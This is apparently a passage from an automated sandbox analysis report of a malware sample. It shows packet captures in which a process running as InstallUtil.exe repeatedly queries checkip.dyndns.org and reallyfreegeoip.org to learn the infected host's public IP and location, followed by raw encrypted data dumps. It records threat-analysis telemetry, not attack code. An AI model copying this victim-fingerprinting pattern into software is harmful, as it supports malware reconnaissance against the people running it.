                                                                                    Data Ascii: baIvyWACL6cri;5%'?hF3.*R/X~>+WIA_54G'Wsx#c#)<AJ7%Ywh5)5:p+:x]>wDyEDU/S%X|>W
                                                                                    Jan 13, 2025 11:45:00.860188961 CET1236INData Raw: 39 27 aa f5 3a 49 20 fa c5 7d cd 8b 57 1f e3 29 e1 d3 d5 2e 95 f7 e2 53 75 6c cb e8 cc 90 1f be 3a 9c 22 bb 59 62 2b 3f 08 15 3e a5 24 94 0f 14 bf 1a fd 50 a4 40 64 5f 95 80 a2 78 6a 59 72 4d b3 02 34 7d 14 d2 7e 9c 3b 8c 3a 3d 81 05 ec ba e9 a0
                                                                                    Data Ascii: 9':I }W).Sul:"Yb+?>$P@d_xjYrM4}~;:=A/v?x,|c72uX4~z9\4N3Li2(CY*Pd}Jn0i+*EOX/^FNa#&{3&xmvce
                                                                                    Jan 13, 2025 11:45:00.860227108 CET1236INData Raw: 5c 9b f9 b2 94 e3 89 f7 04 94 ae 6b 4b 0d 4b dd 3d f3 ef b2 36 9f 32 ad 6a 28 1b 4d 44 6a a1 65 1a 97 e3 28 95 74 2c 3a 4a 4c 54 93 fb f3 4c 3a 79 fc ba 18 b6 fa 02 1f 91 2a 8d 33 95 12 a5 2c be 17 b9 5f 9d 10 88 62 97 58 10 0e f7 07 e8 86 51 bf
                                                                                    Data Ascii: \kKK=62j(MDje(t,:JLTL:y*3,_bXQt~<IP&eZi"fA9hc1$d\a'gNtGRz%H]rjq<{Fhb?5vf{>qd}~K+I6mj6}@vnvbIUSH(T4,
                                                                                    Jan 13, 2025 11:45:00.860263109 CET1236INData Raw: 63 39 af d7 87 8a ae af 85 53 e2 12 02 ea 85 7c e8 1d a5 3e 6c 97 fb 31 63 58 be 71 6c 89 3b 55 3a 48 5e 4b 52 d8 1c 47 3c 34 29 74 3e c9 57 11 ec 9d 6b cc fe 56 9d e6 f8 a1 94 a7 39 6e 9f cc 1e cc f1 0b 91 9b 0a f2 e3 17 6f 53 19 13 c6 b1 f5 3b
                                                                                    Data Ascii: c9S|>l1cXql;U:H^KRG<4)t>WkV9noS;0/Adt(QtDUE$~3cSp/7kjn2<sNM.IetGYs1=DT)*>!qeUswJEMYc.zXl10
                                                                                    Jan 13, 2025 11:45:00.860297918 CET1236INData Raw: 76 a5 10 0d 12 3f bb 7b 17 a2 2c fa ef 1a 8c a4 7c cc da f3 4f 1a 2a e8 65 df d6 1a 7a d7 de 6b 4f ac dd 85 7b 2f 4a 55 b2 71 f6 44 a6 81 33 8a d0 d0 42 d9 c3 04 5e 1d f8 57 d3 6d 06 95 e5 9c 9f d0 0f 8f 3c e5 82 bc bd e6 bc fb c9 8e f6 61 29 96
                                                                                    Data Ascii: v?{,|O*ezkO{/JUqD3B^Wm<a)yD1QL(\i0+ 9#eNvM7uyZqNIQrg43Pm602roe$%XSRn&/~m4nztKh
                                                                                    Jan 13, 2025 11:45:00.860332966 CET1236INData Raw: 4e 26 e0 4b 07 c2 27 92 71 44 d5 76 d9 43 f5 e0 d2 b2 26 79 a4 5e 42 b7 64 68 92 7f fe 61 cb d8 9c 3b 83 00 24 ad c3 5c 71 5a 85 d5 9a 4f c7 ed 24 fb 60 0a 93 3d 1e 7d 46 74 1a 4e 52 66 eb 47 fc 00 59 43 73 30 68 58 14 e8 7b 8f ea e7 9c e6 c6 c3
                                                                                    Data Ascii: N&K'qDvC&y^Bdha;$\qZO$`=}FtNRfGYCs0hX{.9vX^1FlD#o0gkX6vS'DGkXs-B+qnB}&4)$`i^oDYW-'U7+pp:SX,W"*=[%


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549708158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:16.882298946 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:31.253206968 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 99823c52c78160865abf8b34ea38b036
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 13, 2025 11:45:31.259454012 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 13, 2025 11:45:31.743355036 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 8a67a4230bb41e0bb0ded630b2248c6d
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Jan 13, 2025 11:45:32.460578918 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 13, 2025 11:45:32.753940105 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: ce1781566e296d966d71f80b57751935
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549816158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:33.384304047 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Jan 13, 2025 11:45:42.370737076 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:42 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 976e9c08fdf558a12e106a36d3fc70dd
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549879158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:42.982521057 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:47.065490007 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:46 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 5ceba3261ede81ca4509b21fee038078
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549912158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:47.672338009 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:49.004749060 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:48 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: daceaeae3a5a2b5317d6b09dc1bad587
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.549924158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:49.655493975 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:50.259200096 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:50 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 5cc6af92911de50189824aa164c8567a
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.549936158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:50.877466917 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:51.466098070 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:51 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 806d6d89c2a50d081e631943668d1a95
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549947158.101.44.242805148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 13, 2025 11:45:52.074992895 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Jan 13, 2025 11:45:52.637284994 CET321INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 7fc723abcd77584be59b0a7f287c2297
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549804104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:45:32 UTC855INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:32 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079921
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLn1CtTC1sSEnMlEFFeQDibsEscrW0J4TTrz52DnaTdL%2FjfH4SKOf5oUKUfJ%2F1u2kNpveAPoOWSuCQKCvJDpFI2j2h%2FEsVuIUCxuvOLN3pt2a22Hp7uY7hzLHm06Vs6GqL6x27XH"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc1d6cf143ee-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1731&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1650650&cwnd=228&unsent_bytes=0&cid=b206d4cdb021c9c4&ts=176&x=0"
                                                                                    2025-01-13 10:45:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549810104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2025-01-13 10:45:33 UTC853INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:33 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079922
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VgGvJlObA7cYGzef8iXkihH9fdyTJl2Pp%2BosFzzo4BzUWKfPfGJ69QuhSOPq8h81MBzVku0h3nrlAIumxZFV4rIU1FQe2a0gtcSVAvsU0VTcIc2zfG%2By66R97otQaLM6nhEpH3qt"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc2338c543ee-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1708&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1674311&cwnd=228&unsent_bytes=0&cid=04d998cd72bc4c25&ts=159&x=0"
                                                                                    2025-01-13 10:45:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549874104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2025-01-13 10:45:42 UTC861INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:42 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079932
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NIugROFfWppgnww9JvHbnld8%2BEtTt%2FYqn0lwAZMH0AnNQ6w%2FwKd%2FS97TsGJNpxz%2BhTphTuoJhazy53iDswtJ1ojkQUsdONpt7R719j%2FBdUyb8Uuw0nTedxd9Vpltgo3CGdBYLvOb"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc5f2bc60f36-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1471&rtt_var=571&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1985044&cwnd=231&unsent_bytes=0&cid=90875d0a5605d2e9&ts=134&x=0"
                                                                                    2025-01-13 10:45:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549906104.21.80.14435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:45:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:45:47 UTC853INHTTP/1.1 200 OK
                                                                                    Date: Mon, 13 Jan 2025 10:45:47 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 2079936
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZH7kxPgJcQAE8YqTLQrTKZ4Ab98PhfbjL%2FudgnTIklQn6uX3AwY2pyivMcflbI36Z54DRVjwkXIx5%2BRcHIGWeHpwYBszQtMgZ7i8nDH9AkX4IEjQAHSTbxHFXmqCKwu4lG5QP8D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 9014cc7c78797d0e-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1909&min_rtt=1892&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1439132&cwnd=244&unsent_bytes=0&cid=f9913e229f98e30a&ts=138&x=0"
                                                                                    2025-01-13 10:45:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


